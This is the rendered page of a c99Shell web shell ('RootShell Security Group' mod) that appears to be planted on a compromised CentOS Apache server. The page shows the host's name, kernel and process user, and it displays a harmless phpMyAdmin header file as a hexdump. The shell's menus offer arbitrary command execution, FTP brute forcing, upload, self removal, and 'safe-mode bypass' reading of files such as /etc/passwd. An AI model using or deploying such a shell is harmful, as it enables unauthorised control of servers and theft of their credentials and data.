!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/libraries/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     header_http.inc.php (720 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/phpMyAdmin/libraries/header_http.inc.php
Size 720 B
MD5 023214e79aebd4f8635103fa608100fd
Owner/Group apache/root
Perms-rw-r--r--
Create time 05/09/2012 17:45:15
Access time 17/07/2024 14:58:10
MODIFY time 24/11/2005 15:15:00

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
3C 3F 70 68 70 0A 2F 2A 20 24 49 64 3A 20 68 65 61 64 65 72 5F 68 74 74
70 2E 69 6E 63 2E 70 68 70 2C 76 20 32 2E 34 20 32 30 30 35 2F 31 31 2F
32 34 20 30 38 3A 31 35 3A 30 30 20 6E 69 6A 65 6C 20 45 78 70 20 24 20
2A 2F 0A 2F 2F 20 76 69 6D 3A 20 65 78 70 61 6E 64 74 61 62 20 73 77 3D
34 20 74 73 3D 34 20 73 74 73 3D 34 3A 0A 0A 69 66 20 28 69 73 73 65 74
28 24 5F 52 45 51 55 45 53 54 5B 27 47 4C 4F 42 41 4C 53 27 5D 29 20 7C
7C 20 69 73 73 65 74 28 24 5F 46 49 4C 45 53 5B 27 47 4C 4F 42 41 4C 53
27 5D 29 29 20 7B 0A 20 20 20 20 64 69 65 28 22 47 4C 4F 42 41 4C 53 20
6F 76 65 72 77 72 69 74 65 20 61 74 74 65 6D 70 74 22 29 3B 0A 7D 0A 0A
2F 2A 2A 0A 20 2A 20 53 65 6E 64 73 20 68 74 74 70 20 68 65 61 64 65 72
73 0A 20 2A 2F 0A 24 47 4C 4F 42 41 4C 53 5B 27 6E 6F 77 27 5D 20 3D 20
67 6D 64 61 74 65 28 27 44 2C 20 64 20 4D 20 59 20 48 3A 69 3A 73 27 29
20 2E 20 27 20 47 4D 54 27 3B 0A 68 65 61 64 65 72 28 27 45 78 70 69 72
65 73 3A 20 27 20 2E 20 24 47 4C 4F 42 41 4C 53 5B 27 6E 6F 77 27 5D 29
3B 20 2F 2F 20 72 66 63 32 36 31 36 20 2D 20 53 65 63 74 69 6F 6E 20 31
34 2E 32 31 0A 68 65 61 64 65 72 28 27 4C 61 73 74 2D 4D 6F 64 69 66 69
65 64 3A 20 27 20 2E 20 24 47 4C 4F 42 41 4C 53 5B 27 6E 6F 77 27 5D 29
3B 0A 68 65 61 64 65 72 28 27 43 61 63 68 65 2D 43 6F 6E 74 72 6F 6C 3A
20 6E 6F 2D 73 74 6F 72 65 2C 20 6E 6F 2D 63 61 63 68 65 2C 20 6D 75 73
74 2D 72 65 76 61 6C 69 64 61 74 65 2C 20 70 72 65 2D 63 68 65 63 6B 3D
30 2C 20 70 6F 73 74 2D 63 68 65 63 6B 3D 30 2C 20 6D 61 78 2D 61 67 65
3D 30 27 29 3B 20 2F 2F 20 48 54 54 50 2F 31 2E 31 0A 68 65 61 64 65 72
28 27 50 72 61 67 6D 61 3A 20 6E 6F 2D 63 61 63 68 65 27 29 3B 20 2F 2F
20 48 54 54 50 2F 31 2E 30 0A 69 66 20 28 21 64 65 66 69 6E 65 64 28 27
49 53 5F 54 52 41 4E 53 46 4F 52 4D 41 54 49 4F 4E 5F 57 52 41 50 50 45
52 27 29 29 20 7B 0A 20 20 20 20 2F 2F 20 44 65 66 69 6E 65 20 74 68 65
20 63 68 61 72 73 65 74 20 74 6F 20 62 65 20 75 73 65 64 0A 20 20 20 20
68 65 61 64 65 72 28 27 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 65
78 74 2F 68 74 6D 6C 3B 20 63 68 61 72 73 65 74 3D 27 20 2E 20 24 47 4C
4F 42 41 4C 53 5B 27 63 68 61 72 73 65 74 27 5D 29 3B 0A 7D 0A 3F 3E 0A
<?php /* $Id: header_htt
p.inc.php,v 2.4 2005/11/
24 08:15:00 nijel Exp $ 
*/ // vim: expandtab sw=
4 ts=4 sts=4:  if (isset
($_REQUEST['GLOBALS']) |
| isset($_FILES['GLOBALS
'])) {     die("GLOBALS 
overwrite attempt"); }  
/**  * Sends http header
s  */ $GLOBALS['now'] = 
gmdate('D, d M Y H:i:s')
 . ' GMT'; header('Expir
es: ' . $GLOBALS['now'])
; // rfc2616 - Section 1
4.21 header('Last-Modifi
ed: ' . $GLOBALS['now'])
; header('Cache-Control:
 no-store, no-cache, mus
t-revalidate, pre-check=
0, post-check=0, max-age
=0'); // HTTP/1.1 header
('Pragma: no-cache'); //
 HTTP/1.0 if (!defined('
IS_TRANSFORMATION_WRAPPE
R')) {     // Define the
 charset to be used     
header('Content-Type: te
xt/html; charset=' . $GL
OBALS['charset']); } ?> 

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0187 ]--